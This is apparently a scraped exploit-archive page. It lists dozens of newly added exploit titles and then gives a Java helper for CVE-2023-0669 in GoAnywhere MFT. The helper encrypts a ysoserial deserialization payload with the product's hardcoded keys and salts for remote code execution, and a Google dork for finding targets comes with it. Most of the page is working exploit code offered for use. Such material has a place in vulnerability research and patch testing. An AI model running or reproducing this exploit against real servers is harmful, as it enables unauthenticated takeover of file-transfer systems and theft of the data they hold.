
34 changes to exploits/shellcodes/ghdb ENTAB ERP 1.0 - Username PII leak ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) FortiRecorder 6.4.3 - Denial of Service Schneider Electric v1.0 - Directory traversal & Broken Authentication Altenergy Power Control Software C1.2.5 - OS command injection Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Lucee Scheduled Job v1.0 - Command Execution Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) Adobe Connect 11.4.5 - Local File Disclosure Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) Suprema BioStar 2 v2.8.16 - SQL Injection Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS) dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure Icinga Web 2.10 - Arbitrary File Disclosure Joomla! v4.2.8 - Unauthenticated information disclosure Medicine Tracker System v1.0 - Sql Injection Online Appointment System V1.0 - Cross-Site Scripting (XSS) Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) pfsenseCE v2.6.0 - Anti-brute force protection bypass Restaurant Management System 1.0 - SQL Injection WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) Microsoft Windows 11 - 'cmd.exe' Denial of Service ActFax 10.10 - Unquoted Path Services ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
60 lines
No EOL
3 KiB
Java
60 lines
No EOL
3 KiB
Java
// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
|
|
// Google Dork: title:"GoAnywhere"
|
|
// Date: 3/26/2023
|
|
// Exploit Author: Youssef Muhammad
|
|
// Vendor Homepage: https://www.goanywhere.com/
|
|
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
|
|
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
|
|
// Tested on: Windows, Linux
|
|
// CVE : CVE-2023-0669
|
|
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution
|
|
|
|
import java.util.Base64;
|
|
import javax.crypto.Cipher;
|
|
import java.nio.charset.StandardCharsets;
|
|
import javax.crypto.SecretKeyFactory;
|
|
import javax.crypto.spec.PBEKeySpec;
|
|
import javax.crypto.spec.IvParameterSpec;
|
|
import javax.crypto.spec.SecretKeySpec;
|
|
import java.nio.file.Files;
|
|
import java.nio.file.Paths;
|
|
public class CVE_2023_0669_helper {
|
|
static String ALGORITHM = "AES/CBC/PKCS5Padding";
|
|
static byte[] KEY = new byte[30];
|
|
static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
|
|
public static void main(String[] args) throws Exception {
|
|
if (args.length != 2) {
|
|
System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
|
|
System.exit(1);
|
|
}
|
|
String filePath = args[0];
|
|
String version = args[1];
|
|
byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
|
|
String encryptedContent = encrypt(fileContent, version);
|
|
System.out.println(encryptedContent);
|
|
}
|
|
public static String encrypt(byte[] data, String version) throws Exception {
|
|
Cipher cipher = Cipher.getInstance(ALGORITHM);
|
|
KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
|
|
SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
|
|
IvParameterSpec ivSpec = new IvParameterSpec(IV);
|
|
cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
|
|
byte[] encryptedObject = cipher.doFinal(data);
|
|
String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
|
|
String v = (version.equals("2")) ? "$2" : "";
|
|
bundle += v;
|
|
return bundle;
|
|
}
|
|
private static byte[] getInitializationValue() throws Exception {
|
|
// Version 1 Encryption
|
|
String param1 = "go@nywhereLicenseP@$$wrd";
|
|
byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
|
|
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
|
|
}
|
|
private static byte[] getInitializationValueV2() throws Exception {
|
|
// Version 2 Encryption
|
|
String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
|
|
byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
|
|
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
|
|
}
|
|
} |